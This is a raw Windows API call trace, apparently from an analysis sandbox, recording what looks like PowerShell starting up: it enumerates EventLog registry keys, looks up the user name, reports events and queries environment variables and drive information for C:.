	[0204.257] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0204.257] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x4, lpName=0x2989c0, lpcchName=0x1bd4c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1bd4c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.259] CoTaskMemFree (pv=0x2989c0) 
	[0204.259] CoTaskMemFree (pv=0x0) 
	[0204.259] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0204.259] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x5, lpName=0x2989c0, lpcchName=0x1bd4c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1bd4c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.260] CoTaskMemFree (pv=0x2989c0) 
	[0204.260] CoTaskMemFree (pv=0x0) 
	[0204.260] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0204.260] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x6, lpName=0x2989c0, lpcchName=0x1bd4c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1bd4c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.261] CoTaskMemFree (pv=0x2989c0) 
	[0204.261] CoTaskMemFree (pv=0x0) 
	[0204.261] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0204.261] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x7, lpName=0x2989c0, lpcchName=0x1bd4c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1bd4c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.263] CoTaskMemFree (pv=0x2989c0) 
	[0204.263] CoTaskMemFree (pv=0x0) 
	[0204.263] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0204.263] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x8, lpName=0x2989c0, lpcchName=0x1bd4c8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1bd4c8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0204.264] CoTaskMemFree (pv=0x2989c0) 
	[0204.264] CoTaskMemFree (pv=0x0) 
	[0204.264] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x310) returned 0x0
	[0204.264] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x0) returned 0x2
	[0204.264] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x324) returned 0x0
	[0204.264] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x0) returned 0x2
	[0204.264] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x330) returned 0x0
	[0204.264] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x0) returned 0x2
	[0204.265] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x334) returned 0x0
	[0204.265] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x0) returned 0x2
	[0204.265] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x338) returned 0x0
	[0204.265] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x0) returned 0x2
	[0204.265] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x33c) returned 0x0
	[0204.265] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x0) returned 0x2
	[0204.265] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x0) returned 0x5
	[0204.279] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x340) returned 0x0
	[0204.279] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x0) returned 0x2
	[0204.279] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x344) returned 0x0
	[0204.279] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd528 | out: phkResult=0x1bd528*=0x348) returned 0x0
	[0204.279] RegCloseKey (hKey=0x348) returned 0x0
	[0204.279] RegCloseKey (hKey=0x30c) returned 0x0
	[0204.280] RegCloseKey (hKey=0x344) returned 0x0
	[0204.857] CoTaskMemAlloc (cb=0x804) returned 0x1b7c6ed0
	[0204.857] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7c6ed0, nSize=0x1bd738 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1bd738) returned 0x1
	[0204.857] CoTaskMemFree (pv=0x1b7c6ed0) 
	[0204.858] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0204.858] GetUserNameW (in: lpBuffer=0x2989c0, pcbBuffer=0x1bd778 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1bd778) returned 1
	[0204.859] CoTaskMemFree (pv=0x2989c0) 
	[0211.878] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd478 | out: phkResult=0x1bd478*=0x34c) returned 0x0
	[0211.878] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1bd3ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1bd3e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1bd3ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1bd3e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.878] CoTaskMemFree (pv=0x0) 
	[0211.878] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0211.878] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0x2989c0, lpcchName=0x1bd478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1bd478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.878] CoTaskMemFree (pv=0x2989c0) 
	[0211.878] CoTaskMemFree (pv=0x0) 
	[0211.878] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0211.878] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0x2989c0, lpcchName=0x1bd478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1bd478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.878] CoTaskMemFree (pv=0x2989c0) 
	[0211.878] CoTaskMemFree (pv=0x0) 
	[0211.878] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0211.878] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0x2989c0, lpcchName=0x1bd478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1bd478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.878] CoTaskMemFree (pv=0x2989c0) 
	[0211.878] CoTaskMemFree (pv=0x0) 
	[0211.878] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0211.878] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x3, lpName=0x2989c0, lpcchName=0x1bd478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1bd478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.879] CoTaskMemFree (pv=0x2989c0) 
	[0211.879] CoTaskMemFree (pv=0x0) 
	[0211.879] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0211.879] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x4, lpName=0x2989c0, lpcchName=0x1bd478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1bd478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.879] CoTaskMemFree (pv=0x2989c0) 
	[0211.879] CoTaskMemFree (pv=0x0) 
	[0211.879] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0211.879] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x5, lpName=0x2989c0, lpcchName=0x1bd478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1bd478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.879] CoTaskMemFree (pv=0x2989c0) 
	[0211.879] CoTaskMemFree (pv=0x0) 
	[0211.879] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0211.879] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x6, lpName=0x2989c0, lpcchName=0x1bd478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1bd478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.879] CoTaskMemFree (pv=0x2989c0) 
	[0211.879] CoTaskMemFree (pv=0x0) 
	[0211.879] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0211.879] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x7, lpName=0x2989c0, lpcchName=0x1bd478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1bd478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.879] CoTaskMemFree (pv=0x2989c0) 
	[0211.879] CoTaskMemFree (pv=0x0) 
	[0211.879] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0211.879] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x8, lpName=0x2989c0, lpcchName=0x1bd478, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1bd478, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.879] CoTaskMemFree (pv=0x2989c0) 
	[0211.879] CoTaskMemFree (pv=0x0) 
	[0211.879] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x350) returned 0x0
	[0211.879] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x0) returned 0x2
	[0211.879] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x354) returned 0x0
	[0211.879] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x0) returned 0x2
	[0211.880] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x358) returned 0x0
	[0211.880] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x0) returned 0x2
	[0211.880] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x35c) returned 0x0
	[0211.880] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x0) returned 0x2
	[0211.880] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x360) returned 0x0
	[0211.880] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x0) returned 0x2
	[0211.880] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x364) returned 0x0
	[0212.606] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x0) returned 0x2
	[0212.606] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x0) returned 0x5
	[0212.631] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x364) returned 0x0
	[0212.632] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x0) returned 0x2
	[0212.632] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x368) returned 0x0
	[0212.632] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x0) returned 0x2
	[0212.632] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bd4d8 | out: phkResult=0x1bd4d8*=0x0) returned 0x5
	[0213.541] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b900008
	[0213.793] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e72038*="WSMan", lpRawData=0x2e71da8) returned 1
	[0213.807] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0213.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.807] CoTaskMemFree (pv=0x2b5590) 
	[0213.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bcfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bcf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bcf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.809] CoTaskMemAlloc (cb=0x804) returned 0x1b7c6ed0
	[0213.809] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7c6ed0, nSize=0x1bd738 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1bd738) returned 0x1
	[0213.809] CoTaskMemFree (pv=0x1b7c6ed0) 
	[0213.809] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0213.809] GetUserNameW (in: lpBuffer=0x2989c0, pcbBuffer=0x1bd778 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1bd778) returned 1
	[0213.809] CoTaskMemFree (pv=0x2989c0) 
	[0213.810] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e779c8*="Alias", lpRawData=0x2e77758) returned 1
	[0213.822] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0213.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.822] CoTaskMemFree (pv=0x2b5590) 
	[0213.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bcfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bcf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bcf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0213.824] CoTaskMemAlloc (cb=0x804) returned 0x1b7c6ed0
	[0213.824] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7c6ed0, nSize=0x1bd738 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1bd738) returned 0x1
	[0213.824] CoTaskMemFree (pv=0x1b7c6ed0) 
	[0213.824] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0213.824] GetUserNameW (in: lpBuffer=0x2989c0, pcbBuffer=0x1bd778 | out: lpBuffer="aETAdzjz", pcbBuffer=0x1bd778) returned 1
	[0213.825] CoTaskMemFree (pv=0x2989c0) 
	[0213.825] ReportEventW (hEventLog=0x1b900008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e7cf70*="Environment", lpRawData=0x2e7cd00) returned 1
	[0213.861] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0213.861] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.861] CoTaskMemFree (pv=0x2b5590) 
	[0213.862] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0213.862] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0213.862] CoTaskMemFree (pv=0x2b5590) 
	[0213.862] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0213.862] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0213.862] CoTaskMemFree (pv=0x2b5590) 
	[0213.862] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x1bd2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0213.863] SetErrorMode (uMode=0x1) returned 0x1
	[0213.863] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x1bd4f0 | out: lpFileInformation=0x1bd4f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.863] SetErrorMode (uMode=0x1) returned 0x1
	[0213.864] GetLogicalDrives () returned 0x4
	[0213.864] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1bd050, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.865] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0213.865] SetErrorMode (uMode=0x1) returned 0x1
	[0213.866] CoTaskMemAlloc (cb=0x68) returned 0x1b7a3890
	[0213.866] CoTaskMemAlloc (cb=0x68) returned 0x1b7a3900
	[0213.866] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b7a3890, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x1bd4c0, lpMaximumComponentLength=0x1bd4bc, lpFileSystemFlags=0x1bd4b8, lpFileSystemNameBuffer=0x1b7a3900, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1bd4c0*=0x705ba84c, lpMaximumComponentLength=0x1bd4bc*=0xff, lpFileSystemFlags=0x1bd4b8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0213.866] CoTaskMemFree (pv=0x1b7a3890) 
	[0213.866] CoTaskMemFree (pv=0x1b7a3900) 
	[0213.866] SetErrorMode (uMode=0x1) returned 0x1
	[0213.866] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0213.867] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1bd200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.867] SetErrorMode (uMode=0x1) returned 0x1
	[0213.868] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1bd460 | out: lpFileInformation=0x1bd460*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.868] SetErrorMode (uMode=0x1) returned 0x1
	[0213.868] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1bd200, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.868] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1bd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.868] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0213.868] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1bcfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.868] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0213.869] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1bd030, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.869] SetErrorMode (uMode=0x1) returned 0x1
	[0213.869] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1bd290 | out: lpFileInformation=0x1bd290*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.869] SetErrorMode (uMode=0x1) returned 0x1
	[0213.869] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1bd030, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.869] SetErrorMode (uMode=0x1) returned 0x1
	[0213.869] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1bd290 | out: lpFileInformation=0x1bd290*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.869] SetErrorMode (uMode=0x1) returned 0x1
	[0213.870] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1bd0d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0213.870] SetErrorMode (uMode=0x1) returned 0x1
	[0213.870] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1bd330 | out: lpFileInformation=0x1bd330*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0213.870] SetErrorMode (uMode=0x1) returned 0x1
	[0213.870] CoTaskMemAlloc (cb=0x804) returned 0x1b7c6ed0
	[0213.870] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7c6ed0, nSize=0x1bd738 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x1bd738) returned 0x1
	[0213.870] CoTaskMemFree (pv=0x1b7c6ed0) 
